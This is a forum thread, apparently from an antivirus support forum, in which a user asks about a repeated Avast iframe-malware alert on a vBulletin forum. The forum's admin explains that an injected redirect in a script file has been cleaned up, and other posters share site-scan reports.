Hello everyone, I have been using the free edition of Avast for a few years now and I’m very happy with the product. Ok to the problem at hand, last weekend and to present every time I visit a forum which I am a member of my Avast alerts me about a Malware threat which it blocked.
Could this be a false positive?
I’m running WinXP on IE8 with Avast5 free edition, I also have free editions of Malwarebytes Anti Malware and Super Anti Spyware, and both have come up clean. I ran a deep scan only last week on all of them and all came back clean, so I a bit confused to what is going on and hope someone out there can help.
Info…
Object: http:/clientscript/vbulletin_md5. (Parts of this line I removed)
Infection: HTML:Iframe-inf
Action: Connection aborted
Process: C:\Program File\Internet Explorer\iexplore.exe
How did you access that URL as I see nothing in the direct link ?
Using some other tools to analyse that javascript file URL doesn’t reveal anything. Of course there is always the possibility that what was there may have been cleaned up.
Obviously we can’t access it that way, so we can’t check out why you are having the problem and we aren’t.
So I would suggest that you try accessing the page, etc manually and see if you still get the alert, probably not. In which case it is likely to be something in or what the app does that triggers the avast alert.
Just tried the link from my bookmarks and was clear, what I will do is to keep an eye on the situation by opening the forum via the browser button and bookmark and see what the results are. If it as suggested could be the browser button then I shall remove it and just use my bookmark link.
I will post here over the weekend with the results.
I found this thread during my remediation efforts on this forum. I’m the admin at trying to deal with this outbreak.
First of all, thanks to all in this thread. I was better able to track the activity because of this. Thanks you Richard42 specifically. I always appreciate a members who actually gives a sh!t and looks for solutions rather than browsing along when they see a problem.
As well, props to avast itself. It is he only AV product that specifically identified the source of the attack on the website itself. All other products alerted me to the final IP source of the attack, but not the intermediate step on my own site. This is obviously what I need to know to remediate the malware.
Among other attacks, it turns out that hackers had used a vulnerability in the forums SEO to overwrite a file and inserted a redirect:
hxxp:www.ww2f.com/clientscript/vbulletin_md5.js
This file has now been repaired and the software upgraded.
I’ve removed two other instances of infections, and I’m hoping a few of you might be able assist me in ensuring that I’ve stamped this out. All I need is for a few of you to visit the site, and if you get any alerts, please post the “Object” portion of the warning here. This way I can identify and remove the problem. The attacks were targeting specific browsers, so if you can visit with more than one browsing tool, that would be even better.
Hi,
as i’m now at work, and here i’m stuck with KAV(admin’s choice ;D ) i tried to access the site with IE, FF, and Chrome, and it seems clean, well from KAV’s “point of view”
Report 2011-03-11 11:23:17 (GMT 1)
Website ww2f.com
Domain Hash de276e97f9c94027062c4c023d7beb83
IP Address 75.127.98.38 [SCAN]
IP Hostname server.ww2f.com
IP Country US (United States)
AS Number 3595
AS Name GNAXNET-AS - Global Net Access, LLC
Detections 1 / 18 (6 %)
Status SUSPICIOUS
Report 2011-03-11 11:07:13 (GMT 1)
IP Address 75.127.98.38
IP Hostname server.ww2f.com
IP Country US
AS Number N/A
AS Name N/A
Detections 0 / 26 (0 %)
Status CLEAN
I appreciate this feedback Asyn, but what am I looking at? According to the timestamps it indicates that the site was CLEAN at 2011-03-11 11:07:13 and then was rates SUSPICIOUS 14 minutes layer at 2011-03-11 11:23:17. Is this accurate or are the Avast times off?
Forget the time stamps…!
What’s important for you, is that your site seems to be clean. (at time of scanning)
So, do you still get a warning from avast…??
asyn
http://www.urlvoid.com/ has a bunch of scanner in one place. Anyway, I don’t get any warning from avast! ATM so looks like you have fixed it.
On another note, AVs are not best way of reminding a webmaster that they are using a vulnerable webapp, the vendor should provide some mailing list to subscribe to.
@ Asyn,
Thanks for thee feedback. Still a bit confused about the timestamps, but as long as I am clear I’m happy. Thankfully, no more warnings from avast.
@ doktornotor
Nice multiple scanner nice, it also showed no infections. And for the record, I know about the AV not being good for determining a site’s health. I always try to stay patched. The reason I posted here (see my first post in this thread), was that avast was the only product that identifies the specific script on my site that was performing the attack, which allowed me to better remediate the problem.
